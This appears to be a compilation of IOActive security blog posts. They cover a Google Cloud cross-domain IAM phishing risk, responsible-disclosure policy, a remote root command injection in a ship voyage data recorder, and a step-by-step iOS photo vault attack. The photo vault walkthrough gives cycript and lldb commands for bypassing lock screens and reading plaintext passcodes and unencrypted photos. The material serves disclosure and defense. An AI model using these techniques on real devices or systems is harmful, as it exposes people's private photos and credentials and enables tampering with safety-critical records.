GUEST BLOG | October 6, 2021

The Risk of Cross-Domain Sharing with Google Cloud’s IAM Policies | Chris Cuevas and Erik Gomez, SADA

We’re part of the security resources at SADA, a leading Google Cloud Premier Partner. With our backgrounds being notably diverse, we appreciate the need for visibility of your core access controls.

If you’re involved in securing your enterprise’s Google Cloud Platform (GCP) environment, ideally, the organization policy for Domain Restricted Sharing (DRS) is well-regarded in your security toolbox. In the event DRS hasn’t made its way into your arsenal, after reading this post, please take a moment and review these docs.

While we’re not covering DRS in-depth here, we will be discussing related concepts. We believe it is crucial for an enterprise to maintain full visibility into which identities have access to its GCP resources. DRS is intended to prevent external or non-enterprise managed identities from obtaining or being provided Identity Access Management (IAM) role bindings within your GCP environment.

If we take this one step further, we believe an enterprise should maintain visibility of the use of its managed identities within external GCP environments. This is the basis of the post where we’ll raise a number of concerns.

The SADA security team has found a feature of IAM that presents challenges with detection and mitigation. We’ll refer to this IAM feature as Cross-Domain Sharing (XDS).

Introduction to XDS

Today, external parties with GCP environments can provide IAM role bindings to your enterprise’s managed identities. These IAM policies can be set and made effective without your knowledge or awareness, resulting in GCP resources being accessed beyond the boundaries of your enterprise. While we agree there are a number of valid use cases for these XDS IAM policies, we are not comfortable with the lack of enterprise visibility.

Malicious actors are constantly seeking new avenues to gain any type of foothold within a targeted organization. Targeting Cloud DevOps and SREs with social engineering attacks yields high rewards as these organizational employees have more elevated privileges and trusted relationships. 

Acknowledging this mindset, let’s consider the following:

Alice (alice@nullexternal.org) views internal.org as a prime target for a social engineering campaign combined with her newly discovered XDS bug. She quickly spins up a new GCP project called “Production Secrets” and adds a GCP IAM role binding to it for Bob (bob@nullinternal.org) (see the diagram below).

Alice then initiates a social engineering campaign targeting Bob, informing him of the new “Production Secrets” project. As Alice is not part of the internal.org organization, the “Production Secrets” project is presented in Bob’s list of available GCP Projects without an organization association. And, if Bob searches for “Production Secrets” using the search bar of the GCP cloud console, the project will again be presented with no clear indicators it’s not actually affiliated with the internal.org GCP organization. With Bob not wanting to miss any team deadlines related to adopting the new “Production Secrets” project, he migrates secrets over and begins creating new ones within the “Production Secrets” project. Alice rejoices as internal.org’s secrets are now fully disclosed and available for additional attacks.

cross domain sharing (XDS) example

If your organization’s identities are being used externally, would you be able to prevent, or even detect, this type of activity? If Bob connects to this external project, what other attacks could he be vulnerable to in this scenario?

Keeping in mind Google Cloud’s IAM identities or “members” in IAM Policies can include users, groups, and domains, bad actors can easily increase their target scope from a single user identity to your entire enterprise. Once the nefarious GCP Project “Production Secrets” is in place and accessible by everyone in your enterprise with GCP environment access, the bad actors can wait for unintended or accidental access while developing more advanced phishing ruses.

Now, the good news!

The team at Google Cloud have been hard at work, and they recently released a new GCP Organization Policy constraint specifically to address this concern. The Organization Policy constraint “constraints/resourcemanager.accessBoundaries” once enabled, removes this concern as a broad phishing vector by not presenting external and no-organization GCP Projects within the Cloud Console and associated APIs. While this approach does not address all risks related to XDS, it does reduce the effective target scope.

Before you run and enable this constraint, remember there are valid use cases for XDS, and we recommend identifying all XDS projects and assessing if they are valid, or if they may be adversely affecting your enterprise’s managed identities. This exercise may help you identify external organizations that are contractors, vendors, partners, etc. and should be included in the Organization Policy constraint.

To further reduce the chances of successful exfiltration of your enterprise’s sensitive data from existing GCP resources via XDS abuse, consider also implementing Google Cloud’s VPC Service Controls (VPC-SC).

Is your GCP environment at risk, or do you have security questions about your GCP environment? SADA and IOActive are here to help. Contact SADA for a Cloud Security Assessment and IOActive for a Cloud Penetration Test.

Chris Cuevas, Sr Security Engineer, SADA
Erik Gomez, Associate CTO, SADA


Note: This concern has been responsibly reported to the Google Cloud Security team.

EDITORIAL | August 3, 2021

Counterproliferation: Doing Our Part

IOActive has always done its part in preventing the misuse of our work.

IOActive’s mission is to make the world a safer and more secure place. In the past, we’ve worked to innovate in the responsible disclosure process, with the most visible and memorable example being Dan Kaminsky’s research into DNS.[1] This involved one of the first uses of widespread, multiparty coordinated responsible disclosure, which quickly became the gold standard as referenced in CERT’s Guide to Responsible Disclosure.[2]

We don’t always talk publicly about our non-technical innovations, since they frequently aren’t as interesting as the groundbreaking cybersecurity research our team delivers. However, a couple recent events have prompted us to speak a bit about some of these less glamorous, but nonetheless extremely important innovations. First, we were deeply saddened by the passing of Dan Kaminsky, and would like to share how we’re building upon his legacy of non-technical innovation in vulnerability research. Second, a significant disclosure covered by global media organizations regarding the misuse of weaponized mobile phone vulnerabilities, packaged with surveillance tools, to target journalists and others for political purposes, rather than for lawful purposes consistent with basic human rights.

What We’re Doing

There are three primary elements to our policies that prevent the misuse of the vulnerabilities we discover.

Responsible Disclosure

IOActive has always had a policy of responsible disclosure. We transparently publish our policy on our website for everyone to see.[3] Over time, we’ve taken additional innovative steps to enhance this disclosure process.

We’ve built upon Dan’s innovation in responsible disclosure by sharing our research with impacted industries through multinational Information Sharing and Analysis Centers (ISACs).[4] Likewise, we’ve worked to confidentially disclose more of our pre-release research to our clients when it may impact them. As our consultants and researchers find new and innovative ways to break things, we’ll find new and innovative ways to disclose their work and associated consequences, with the goal of facilitating the best outcomes for all stakeholders.

Policy on the Sale of Vulnerabilities

IOActive is very clear on this simple policy, both publicly and with our clients: we do not sell vulnerabilities.

A well-developed market for vulnerabilities has existed for some time.[5] Unfortunately, other cybersecurity firms do sell vulnerabilities, and may not have the necessary ethical compartmentalization and required policies in place to safeguard the security and other interests of their clients and the public at large.

While we support the bug bounty concept, which can help reduce the likelihood of vulnerability sales and support the independent research community, as a commercial service bug bounties do not adequately address concerns such as personnel vetting or testing of resources only available when onsite at a client.

Contractual Responsible Disclosure Requirement

As a standard practice in our commercial work, we require the ability to report vulnerabilities we discover in third-party products externally only to the affected manufacturers, in addition to the client, to ensure that an identified defect can be properly corrected. IOActive offers to coordinate this disclosure process to the manufacturers on behalf of our clients.

This normally leads to a virtuous cycle of improved security for everyone through our commercial work. Any vulnerability discovery benefits not only the client, but the entire ecosystem, both of whom in turn benefit from the vulnerability discovery work we do for other clients.

Every person reading this post has benefited from better security in the products and services they and their organizations use every day, due to the combination of our fantastic consultants and clients who support doing the right thing for the ecosystem.

Fundamentally, when a vulnerability is corrected, that risk is retired for everyone who updates to the secure version and prevents the weaponization of the vulnerability. When those fixes are pushed out through an automated update process, the benefits accrue without any active effort on the part of end users or system maintainers.

How to Help

Make it Easy to Receive Disclosures

As a prolific vulnerability discloser, we see a wide spectrum of maturity in receiving and handling vulnerability disclosures. We must often resort to creative and time-intensive efforts to locate a contact who will respond to our attempts to disclose a vulnerability. Occasionally, we run into a dead end and are unable to make productive contact with organizations.

Here’s a short list of actions that will help make it easy to collect vulnerability information your organization really needs:

  1. Run a Vulnerability Disclosure Program. A vulnerability disclosure management program provides bidirectional, secure communication between the discloser and the impacted organization in a formal, operationalized manner. You can run such a program with internal resources or outsource it to a commercial firm providing managed vulnerability disclosure program services.
  2. Be Easy to Find. It should be simple and effortless for a researcher to find details on the disclosure process for any organization. A good test is to search for “<Your Organization Name> Vulnerability Disclosure” or “<Your Organization Name> Vulnerability Report” in a search engine. Ideally, your public disclosure page should appear in the first page or two of results.

Cesar Cerrudo, CTO of IOActive Labs, has a more in-depth post discussing how to get the best outcomes from working with researchers during the vulnerability disclosure process in his post, 10 Laws of Disclosure.[6]

Working with Security Firms

When you’re selecting a security firm for vulnerability discovery work, you should know what they will do with any vulnerabilities they find. Here are a few core questions for which any firm should have detailed, clear answers:

  • Does the company have a responsible disclosure policy?
  • What is the company’s policy regarding the sale of vulnerabilities?
  • Does the company require responsible disclosure of the vulnerabilities it discovers during client work?
  • How does the company handle third-party responsible disclosure for its clients?

Participate in the Discussion

The global norms around the sale and weaponization of cybersecurity vulnerabilities, as well as their integration into surveillance tools, are being established today. More constructive, thoughtful public debate today can prevent the current deleterious conduct from becoming a standard of global behavior with its associated dystopic outcomes through inattention and inaction.


References

[1] https://www.cnet.com/tech/services-and-software/security-bites-107-dan-kaminsky-talks-about-responsible-vulnerability-disclosure/
[2] https://resources.sei.cmu.edu/asset_files/SpecialReport/2017_003_001_503340.pdf
[3] https://ioactive.com/disclosure-policy/
[4] https://www.nationalisacs.org/
[5] https://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf
[6] https://ioactive.com/10-laws-of-disclosure/

EDITORIAL | April 2, 2020

10 Laws of Disclosure

In my 20+ years working in cyber security, I’ve reported more than 1000 vulnerabilities to a wide variety of companies, most found by our team at IOActive as well as some found by me. In reporting these vulnerabilities to many different vendors, the response (or lack thereof) I got is also very different, depending on vendor security maturity. When I think that I have seen everything related to vulnerability disclosures, I’ll have new experiences – usually bad ones – but in general, I keep seeing the same problems over and over again.

I’ve decided it would be a good idea to write about some Laws of Disclosure in order to help those companies that are not mature enough to improve their vulnerability disclosure processes.

Law 1: The vulnerability reporter is always right

It doesn’t matter if the vulnerability reporter is gross, stupid, or insults you, they have zero-day findings on your technology, so you’d better say “please” and “yes” to everything you can. It’s less complicated to deal with someone you don’t like than dealing with 0days in the wild, hurting your business.

Law 2: Have an easy-to-find and simple way to report vulnerabilities

It shouldn’t take more than a few seconds browsing your website to find how to report a vulnerability. Make it easy and simple as possible; otherwise, you’ll learn about the vulnerability on the news.

Law 3: Your rules and procedures are not important

Some vulnerability reporters don’t care about your rules and procedures for reporting, they don’t want your bounty or compensation. They don’t have to follow your rules; they just want the vulnerability reported and fixed.

Law 4: Keep vulnerability reporter up to date

Never keep the vulnerability reporter in the dark. Instantly acknowledge when you receive a vulnerability report, and then keep the finder posted about your actions and plans.

Law 5: Don’t play dirty

Never try to trick the reporter in any way to buy time or avoid public disclosure. Sooner or later the reporter will find out and 0day you. Time is never on your side, so use it wisely.

Law 6: Compensate

The vulnerability reporter is working for free for you, so always compensate them in some way, like a bounty or at least public acknowledgement and thanks.

Law 7: Forget NDAs and threats

The vulnerability reporter is not part of your company and don’t care about your lawyers. The vulnerability must always be fixed and then published, not hidden.

Law 8: Put the right people in place

Your people handing vulnerability reports should have the right knowledge and proper training. Never put lawyers or marketing people in charge of vulnerability disclosure; vulnerability finders don’t want to hear BS from them.

Law 9: Coordinate

Properly coordinate the release dates of your fix and the vulnerability advisory publication. You don’t want your customers exposed for one second.

Law 10: Always publish

Don’t sweep vulnerabilities under the carpet with silent fixes without telling your customers how and why they should update. If you do, the vulnerability reporter will make sure your customers know it, and they won’t be happy when they find out.

These Laws are based on my own experience, but if I’ve missed something, feel free to share your own experience and help contribute to a better vulnerability disclosure process. Also, if you ever need help with disclosures yourself, let me know via Twitter DM or email. I’ll be happy to help.

RESEARCH | December 9, 2015

Maritime Security: Hacking into a Voyage Data Recorder (VDR)

In 2014, IOActive disclosed a series of attacks that affect multiple SATCOM devices, some of which are commonly deployed on vessels. Although there is no doubt that maritime assets are valuable targets, we cannot limit the attack surface to those communication devices that vessels, or even large cruise ships, are usually equipped with. In response to this situation, IOActive provides services to evaluate the security posture of the systems and devices that make up the modern integrated bridges and engine rooms found on cargo vessels and cruise ships. [1]

 

There are multiple facilities, devices, and systems located on ports and vessels and in the maritime domain in general, which are crucial to maintaining safe and secure operations across multiple sectors and nations.

 

Port security refers to protecting all of these assets from acts of piracy, terrorism, and other unlawful activities, such as smuggling. Recent activity appears to demonstrate that cyberattacks against this sector may have been underestimated. As threats evolve, procedures and policies must improve to take these new attack scenarios into account. For example,https://www.federalregister.gov/articles/2014/12/18/2014-29658/guidance-on-maritime-cybersecurity-standards

 

This blog post describes IOActive’s research related to one type of equipment usually present in vessels, Voyage Data Recorders (VDRs). In order to understand a little bit more about these devices, I’ll detail some of the internals and vulnerabilities found in one of these devices, the Furuno VR-3000.

 

What is a Voyage Data Recorder?

(http://www.imo.org/en/OurWork/Safety/Navigation/Pages/VDR.aspx ) A VDR is equivalent to an aircraft’s ‘BlackBox’. These devices record crucial data, such as radar images, position, speed, audio in the bridge, etc. This data can be used to understand the root cause of an accident.

 

Real Incidents

Several years ago, piracy acts were on the rise. Multiple cases were reported almost every day. As a result, nation-states along with fishing and shipping companies decided to protect their fleet, either by sending in the military or hiring private physical security companies.

On February 15, 2012, two Indian fishermen were shot by Italian marines onboard the Enrica merchant vessel, who supposedly opened fire thinking they were being attacked by pirates. This incident caused a serious diplomatic conflict between Italy and India, which continues to the present. https://en.wikipedia.org/wiki/Enrica_Lexie_case

 

‘Mysteriously’, the data collected from the sensors and voice recordings stored in the VDR during the hours of the incident was corrupted, making it totally unusable for authorities to use during their investigation.  As this story, from Indian Times, mentions the VDR could have provided authorities with crucial clues to figure out what really happened.

 

Curiously, Furuno was the manufacturer of the VDR that was corrupted in this incident. This Kerala High Court’s document covers this fact: http://indiankanoon.org/doc/187144571/ However, we cannot say whether the model Enrica Lexie was equipped with was the VR-3000. Just as a side note, the vessel was built in 2008 and the Furuno VR-3000 was apparently released in 2007.

 

Just a few weeks later, on March 1, 2012, the Singapore-flagged cargo ship MV. Prabhu Daya was involved in a hit-and-run incident off the Kerala Coast. As a result, three fishermen were killed and one more disappeared and was eventually rescued by a fishing vessel in the area. Indian authorities initiated an investigation of the accident that led to the arrest of the MV. Prabhu Daya’s captain.

During that process, an interesting detail was reported in several Indian newspapers.

http://www.thehindu.com/news/national/tamil-nadu/voyage-data-recorder-of-prabhu-daya-may-have-been-tampered-with/article2982183.ece

 

So, What’s Going on Here?

From a security perspective, it seems clear VDRs pose a really interesting target. If you either want to spy on a vessel’s activities or destroy sensitive data that may put your crew in a difficult position, VDRs are the key.

 

Understanding a VDR’s internals can provide authorities, or third-parties, with valuable information when performing forensics investigations. However, the ability to precisely alter data can also enable anti-forensics attacks, as described in the real incident previously mentioned.

 

As usual, I didn’t have access to the hardware; but fortunately, I played some tricks and found both firmware and software for the target VDR. The details presented below are exclusively based on static analysis and user-mode QEMU emulation (already explained in a previous blog post). [2]
 
Figure: Typical architecture of a VR-3000

 

Basically, inside the Data Collecting Unit (DCU) is a Linux machine with multiple communication interfaces, such as USB, IEEE1394, and LAN. Also inside the DCU, is a backup HDD that partially replicates the data stored on the Data Recording Unit (DRU). The DRU is protected against aggressions in order to survive in the case of an accident. It also contains a Flash disk to store data for a 12 hour period. This unit stores all essential navigation and status data such bridge conversations, VHF communications, and radar images.

 

The International Maritime Organization (IMO) recommends that all VDR and S-VDR systems installed on or after 1 July 2006 be supplied with an accessible means for extracting the stored data from the VDR or S-VDR to a laptop computer. Manufacturers are required to provide software for extracting data, instructions for extracting data, and cables for connecting between a recording device and computer.

 

The following documents provide more detailed information:
After spending some hours reversing the different binaries, it was clear that security is not one of its main strengths of this equipment. Multiple services are prone to buffer overflows and command injection vulnerabilities. The mechanism to update firmware is flawed. Encryption is weak. Basically, almost the entire design should be considered insecure.
 

Take this function, extracted from from the Playback software, as an example of how not to perform authentication. For those who are wondering what ‘Encryptor’ is, just a word: Scytale.

 

Digging further into the binary services we can find a vulnerability that allows unauthenticated attackers with remote access to the VR-3000 to execute arbitrary commands with root privileges. This can be used to fully compromise the device. As a result, remote attackers are able to access, modify, or erase data stored on the VDR, including voice conversations, radar images, and navigation data.

VR-3000’s firmware can be updated with the help of Windows software known as ‘VDR Maintenance Viewer’ (client-side), which is proprietary Furuno software.

 

The VR-3000 firmware (server-side) contains a binary that implements part of the firmware update logic: ‘moduleserv’

 

This service listens on 10110/TCP.

 

Internally, both server (DCU) and client-side (VDR Maintenance Viewer, LivePlayer, etc.) use a proprietary session-oriented, binary protocol. Basically, each packet may contain a chain of ‘data units’, which, according to their type, will contain different kinds of data.

 

Figure: Some of the supported commands
‘moduleserv’ several control messages intended to control the firmware upgrade process. Let’s analyze how it handles a ‘SOFTWARE_BACKUP_START’ request:
An attacker-controlled string is used to build a command that will be executed without being properly sanitized. Therefore, this vulnerability allows remote unauthenticated attackers to execute arbitrary commands with root privileges.
Figure: ‘Moduleserv’ v2.54 packet processing
Figure: ‘Moduleserv’ v2.54 unsanitized system call

 

At this point, attackers could modify arbitrary data stored on the DCU in order to, for example, delete certain conversations from the bridge, delete radar images, or alter speed or position readings. Malicious actors could also use the VDR to spy on a vessel’s crew as VDRs are directly connected to microphones located, at a minimum, in the bridge.

 

However, compromising the DCU is not enough to cover an attacker’s tracks, as it only contains a backup HDD, which is not designed to survive extreme conditions. The key device in this anti-forensics scenario would be the DRU. The privileged position gained by compromising the DCU would allow attackers to modify/delete data in the DRU too, as this unit is directly connected through an IEEE1394 interface. The image below shows the structure of the DRU.
Figure: Internal structure of the DRU

Before IMO’s resolution MSC.233(90) [3], VDRs did not have to comply with security standards to prevent data tampering. Taking into account that we have demonstrated these devices can be successfully attacked, any data collected from them should be carefully evaluated and verified to detect signs of potential tampering.

 

IOActive, following our responsible disclosure policy, notified the CERT/CC about this vulnerability in October 2014. The CERT/CC, working alongside the JPCERT/CC, were in contact with Furuno and were able to reproduce and verify the vulnerability. Furuno committed to providing a patch for their customers “sometime in the year of 2015.” IOActive does not have further details on whether a patch has been made available.
 
References
————–

RESEARCH | November 19, 2015

Breaking into and Reverse Engineering iOS Photo Vaults

Every so often we hear stories of people losing their mobile phones, often with sensitive photos on them. Additionally, people may lend their phones to friends only to have those friends start going through their photos. For whatever reason, a lot of people store risqué pictures on their devices. Why they feel the need to do that is left for another discussion. This behavior has fueled a desire to protect photos on mobile devices.

One popular option are photo vault applications. These applications claim to protect your photos, videos, etc. In general, they create albums within their application containers and limit access with a passcode, pattern, or, in the case of newer devices, TouchID.

I decided to take a look at some options for the iOS platform. I did a quick Google search for “best photo vaults iOS” and got the following results:
 
Figure 1: Search results for best iOS photo vaults


I downloaded the free applications, as this is what most typical users would do. This blog post discusses my findings.
Lab Setup
  • Jailbroken iPhone 4S (7.1.2)
  • BurpSuite Pro
  • Hex editor of choice
  • Cycript

Applications Reviewed
  • Private Photo Vault
  •  Photo+Video Vault Keep Safe(My Media)
  •  KeepSafe

I will cover the common techniques I used during each iOS application assessment. Additionally, I will take a deeper look at the Private Photo Vault application and get into some actual reverse engineering. The techniques discussed in the reverse engineering section can be applied to the other applications (left as an exercise for the reader).
Note: Unless otherwise stated, all commands are issued from Mac OS after having ssh’d into the jailbroken mobile device.
 
Private Photo Vault
The first application I looked at was Private Photo Vault. As it turns out, there have been several write-ups about the security, or lack thereof, of this application (see the references section for additional details). Because those write ups were published some time ago, I wanted to see if the developers had corrected the issues. As it turns out, the app was still vulnerable to some of the issues at the time of writing this post.
Bypassing the Lock Screen
When the app launches, the user is presented with the following screen:
Figure 2: Private Photo Vault Lock Screen
 
Bypassing this lock screen was trivial. The first step is to identify the Photo Vault process and then attach to it with cycript. For those not familiar with cycript, the following is taken from the cycript.org site:
Cycript allows developers to explore and modify running applications on either iOS or Mac OS X using a hybrid of Objective-C++ and JavaScript syntax through an interactive console that features syntax highlighting and tab completion.”
To identify the Photo Vault process we issue the following commands:
ps –e | grep “Photo”
And then attach to it as shown:
cycript –p PhotoVault
 
 
 
Figure 3: Attaching to PhotoVault process with cycript
We then print the current view hierarchy using recursiveDescription by issuing the following command:
[[UIApp keyWindow] recursiveDescription]
 
 
 
Figure 4: Current View Hierarchy with recursiveDescription
 
Reviewing the current view hierarchy, we see a number of references to PasswordBox. Let’s see if we can alter what is being displayed. To do that we can issue the following command:
[#viewAddress setHidden:YES].
In this case we are testing the first PasswordBox at 0x15f687f0.
Figure 5: Hiding the first password input box
 
After executing the command we note that the first PasswordBox disappeared:
Figure 6: First password box hidden
Great, we can alter what is being displayed. Having obtained the current view, we now need to determine the controller. This can be accomplished with nextResponder as shown below. See references for details on nextResponder and the whole MVC model.
In a nutshell we keep calling nextResponder on the view until we hit a controller. In our case, we start with [#0x15f687f0 nextResponder] which returns <UIView: 0x15f68790> and then we call nextResponder on that like [#0x15f68790 nextResponder]. Eventually we hit a controller as shown:
Figure 7: Determining the View Controller
 
The WhiteLockScreenViewController controller seems to be responsible for the view. Earlier I dumped the class information with class-dump-z (not shown here). Examining the class revealed an interesting method called dismissLockScreen. Could it be that easy? As it turned out, it was. Simply calling the method as shown below was enough to bypass the lock screen:
Figure 8: Bypassing the lock screen with dismissLockScreen
 
Insecure Storage
During the setup I entered a passcode of 1337 to “protect” my photos. The next step, therefore, was to determine how the application was storing this passcode. Browsing the application directory revealed that the passcode was being stored in plaintext in the com.enchantedcloud.photovault.plistfile in /var/mobile/Applications/A025EF5F-ED84-4D82-A23D-BBCFE183F539/Library/Preferences.
As a side note I wonder what would be the effect of changing “Request Pin = 0”? It may be worth investigating further.
Figure 9: Passcode stored in plaintext
 
Not only is the PIN stored in plaintext, but the user has the option to password protect their albums. This again is stored in plaintext in the Albums.plist plist file.
Figure 10: Album password stored in plaintext
No Encryption
As if this wasn’t bad enough, the stored photos were not encrypted. This has already been pointed out elsewhere. Surprisingly enough, it remains the case as at the time of this writing. The pictures are stored in the /0 directory:
Figure 11: Location of unencrypted photos
 
 
 
Figure 12: Unencrypted view of stored photo
Reverse Engineering Private Photo Vault
Ok, so we have seen how to bypass the lock screen using cycript. However, let’s say that you wanted to go “under the hood “in order to achieve the same goal.
You could achieve this using:
  • IDA Pro/Hopper
  • LLDB
  • Usbmuxd
  • Debugserver

Environment Setup
Attach the mobile device to your host machine and launch tcprelay (usbmuxd directory) using the following syntax:
tcprelay.py  -t  <remote-port-to-forward><local-port-to-listen>
 
 
 
Figure 13: Launching tcprelay for debugging via USB
Tcprelay allows us to debug the application over USB as opposed to wifi, which can often be slow.
SSH into the device, start the debugserver, and attach to the PhotoVault process. Issue the following command:
debugserver *:8080 –a “PhoyoVault”
 
 
 
Figure 14: Launching debugserver on the mobile device
 
Launch lldb from your host machine, and connect to the listening debug server on the mobile device by issuing the following command from within lldb:
process connect connect://localhost:8080
 
 
 
Figure 15: Connecting to debugserver with lldb
Decrypt Binary
Now that the environment is configured, we can start debugging. Decrypt the binary and open it in IDA. I used the following command to decrypt the binary:
DYLD_INSERT_LIBRARIES=dumpdecrypted_armv7.dylib /var/mobile/Applications/A025EF5F-ED84-4D82-A23D-BBCFE183F539/PhotoVault.app/PhotoVault mach -o decryption dumper
 
 
 
Figure 16:Decrypting the PhotoVault binary
At this point I usually check to see if the binary is a FAT binary (i.e. it supports many devices). The command for that is: otool –hV PhotoVault.decrypted
 
 
 
Figure 17: Determining if the binary is a FAT binary
 
If it is indeed a FAT binary, I strip the architecture for my device. Given I am running an iPhone 4S, I ran the following command:
lipo -thin armv7 -output PhotoVault-v7 PhotoVault.decrypted.
The PhotoVault-v7 binary is what we will analyze in IDA or Hopper (see the reference section for instructions on configuring lldb and debugserver).
Earlier we established that WhiteLockScreenViewController was the controller responsible for the lock screen. This will become important in a bit. If we enter an incorrect password, the application prints “Wrong Passcode – Try Again”. Our first step, therefore, is to find occurrences of this in IDA.

Figure 18: Searching for occurrences of “Wrong Passcode”
We see several occurrences, but any reference to WhiteLockScreenViewController should be of interest to us. Let’s investigate this more. After a brief examination we discover the following:

Figure 19: Examining WhiteLockScreenViewController customKeyboardButtonPressed
 
At 0013A102, the lockScreen:isPasswordCorrect method is called, and at 0013A114 the return value is checked. At 0013A118 a decision is made on how to proceed. If we entered an incorrect passcode, the application will branch to loc_13A146 and display “Wrong Passcode” as shown in the snippet below. 
Figure 20: Wrong Passcode branch we need to avoid
Obviously, we want the application to branch to 0013A11A, because in that branch we see references to a selRef_lockScreen_didEnterCorrectPassword_ method.
Figure 21: Branch we are interested in taking
Let’s set breakpoint at 0013A110, right before the check for the return value is done. Before we can do that, we need to account for ASLR, so we must first determine the ASLR Offset on the device.
Figure 22: Breakpoint will set at 0013A110
To accomplish this we issue the following command from within our lldb session:
image list –o -f
The image is loaded at 0xef000 so the address we need to break on is the 0x000ef000 + 0013A110.
Figure 23: Determining ASLR offset
We set a breakpoint at 0x229110 with the following command: br s -a 0x229110.
From this point breakpoints will be calculated as ASLR Offset + IDA Offset.
 
Figure 24: Setting the breakpoint
With our breakpoint set, we go back to the device and enter an arbitrary passcode. The breakpoint is hit and we print the value of register r8 with p $r8.
 
 
 
Figure 25: Examining the value in register r8
Given the value of zero, the TST.W R8, #0xFF instructions will see us taking the branch that prints “Wrong Passcode”. We need to change this value so that we take the other branch. To do that we issue the following command: register write r8 1
 
 
 
Figure 26: Updating the r8 register to 1
 
The command sets the value of register r8 to 1. We are almost there. But before we continue, let’s examine the branch we have taken. In that branch we see a call to lockScreen_didEnterCorrectPassword. So again, we search IDA for that function and the results show it references the PasswordManager class.
Figure 27: Searching IDA for occurences of lockScreen_didEnterCorrectPassword
 
We next examine that function where we notice several things happening:
Figure 28: Examining lockScreen_didEnterCorrectPassword
 
In short, in this block the application reads the PIN stored on the device and compares it to the value we entered at 0012D498. Of course this check will fail, because we entered an incorrect PIN. Looking further at this function revealed a call to the familiar dismissLockScreen. Recall this is the function we called in cycript earlier.
Figure 29: Branch with dismissLockScreen
 
It seems then that we need to take this branch. To do that, we change the value in r0  so that we get our desired result when the TST instruction is called. This ends up tricking the application into thinking we entered the correct PIN. We set a breakpoint at 0012D49C (i.e. the point at which we test for the return value from isEqualToString). Recall we are still in the lockScreen_didEnterCorrectPassword method of the PasswordManager class.
Figure 30: Point at which the PIN is verified
We already know the check will fail, since we entered an incorrect PIN, so we update the value in r0 to 1.
Figure 31: Updating r0 register to 1 to call dismissLockScreen
When we do that and continue execution, the dismissLockScreen method is called and the lock screen disappears, granting us access to the photos. So to recap the first patch allows us to call lockScreen_didEnterCorrectPassword. And then the second patch allows us to call dismissLockScreen, all with an arbitrary pin.
Let’s now look at the other applications.
My Media
Insecure Webserver
This was a very popular application in the app store. However, it suffered from some of the same vulnerabilities highlighted previously. What is interesting about this application is that it starts a web server on port 5555, which essentially allows users to manage their albums.
Figure 32: Web server started on port 5555
Browsing to the address results in the following interface:
Figure 33: My Media Wifi Manager
 
The first thing I noticed was that there was no authentication. Anybody on the same network could potentially gain access to the user’s albums. Looking a little deeper revealed that the application was vulnerable to common web application vulnerabilities. An example of this is stored cross-site scripting (XSS) in the Album name parameter:
Figure 34: Stored XSS in Album name
Insecure Storage
Again, the photos were not encrypted (verified using the hex editor from earlier). Photos and videos were stored in the following location:
/var/mobile/Applications/61273D04-3925-41EF-BD63-C2B0BC128F70/Library/XFFile/Decoy/1/Picture/Album1
Figure 35: Insecure storage of photos
On the device, this looks like the following:
Figure 36:Albums and photos on device
 
One of the features of these password-protected photo vaults is the ability to setup decoys. If the user chooses to create a decoy, then when the decoy password is entered it takes them to a “fake” album. I created a decoy in this application and found that the photos were also not encrypted (not that I expected them to be). I created a decoy album and added a photo. The decoy photos were stored in the following location:
/var/mobile/Applications/B73BB177-CEB7-4576-BDFC-2408A0369D42/Library/XFFile/Decoy/2/Picture/Decoy Album
The application stored user credentials in an unencrypted sqlite database. The passcode required to access the application was 1234 and was tied to the administrative account as shown. This was the passcode I chose when I was configuring the application. I also created a decoy user. These credentials were stored plaintext in the users table.
Figure 37: Extracting credentials with sqlite
 
KeepSafe
 
Bypassing the Lock Screen
Again bypassing the lock screen was trivial.
Figure 38: KeepSafe LockScreen
 
The lock screen could be bypassed by calling the showMainStoryboard method from the KeepSafe.AppDelegateclass. Again we attach to the process with cycript and this time we get the instance methods:
Examining the instance methods reveals the following methods:
And calling the showAccountStoryboard or showMainStoryboard methods as shown bypasses the lock screen: 
Figure 39: Bypassing the lock screen
 
The application also allows the user to password protect each album. Each album is synced to the cloud.
Figure 40: KeepSafe cloud storage
I discovered that the password for the albums was returned in plaintext from the server as shown:
Figure 41: Album password return in plaintext from the server
 
An attacker could therefore not only bypass the lockscreen but he could obtain the passcode for password protected albums as well.
Conclusion
Ok so let’s do a quick recap on what we were able to accomplish. We used:
  • cycript to bypass the lock screens
  • sqlite to extract sensitive information from the application databases
  • plutil to read plist files and access sensitive information
  • BurpSuite Pro to intercept traffic from the application
  • IDA Pro to reverse the binary and achieve results similar to cycript

The scary part of this is that, on average, it took less than 30 minutes to gain access to the photos and user credentials for each application. The only exception was the use of IDA, and as we highlighted, we only did that to introduce you to and get you comfortable reading ARM assembly. In other words, it’s possible for an attacker to access your private photos in minutes.
In all cases it was trivial to bypass the lock screen protection. In short I found:
  • No jailbreak detection routines
  • Insecure storage of credentials
  • Photos stored unencrypted
  • Lock screens are easy to bypass
  • Common web application vulnerabilities

Let me hasten to say that this research does not speak to ALL photo vault applications. I just grabbed what seemed to be the most popular and had a quick look. That said, I wouldn’t be surprised if others had similar issues, as developers often make incorrect assumptions (believing users will never have access to the file system).
What are some of the risks? First and foremost, if you are running these apps on a jailbroken device, it is trivial to gain access to them. And in the case of My Media, even if you are not on a jailbroken device, anyone could connect to the media server it starts up and access your data.
More importantly though is the fact that your data is not encrypted. A malicious app (some of which have popped up recently) could gain access to your data.
The next time you download one of these apps, keep in mind it may not be doing what you think it is doing. Better yet, don’t store “private” photos on your device in the first place.
References:
  1. http://www.zdziarski.com/blog/?p=3951
  2. Hacking and Securing iOS Applications: Stealing Data, Hijacking Software, and How to Prevent It
  3. http://www.cycript.org/
  4. http://cgit.sukimashita.com/usbmuxd.git/snapshot/usbmuxd-1.0.8.tar.gz
  5. http://resources.infosecinstitute.com/ios-application-security-part-42-lldb-usage-continued/
  6. https://github.com/stefanesser/dumpdecrypted
  7. https://developer.apple.com/library/ios/technotes/tn2239/_index.html#//apple_ref/doc/uid/DTS40010638-CH1-SUBSECTION34
  8. https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIResponder_Class/#//apple_ref/occ/instm/UIResponder/nextResponder

INSIGHTS | December 20, 2012

Exploits, Curdled Milk and Nukes (Oh my!)

Throughout the second half of 2012 many security folks have been asking “how much is a zero-day vulnerability worth?” and it’s often been hard to believe the numbers that have been (and continue to be) thrown around. For the sake of clarity though, I do believe that it’s the wrong question… the correct question should be “how much do people pay for working exploits against zero-day vulnerabilities?”

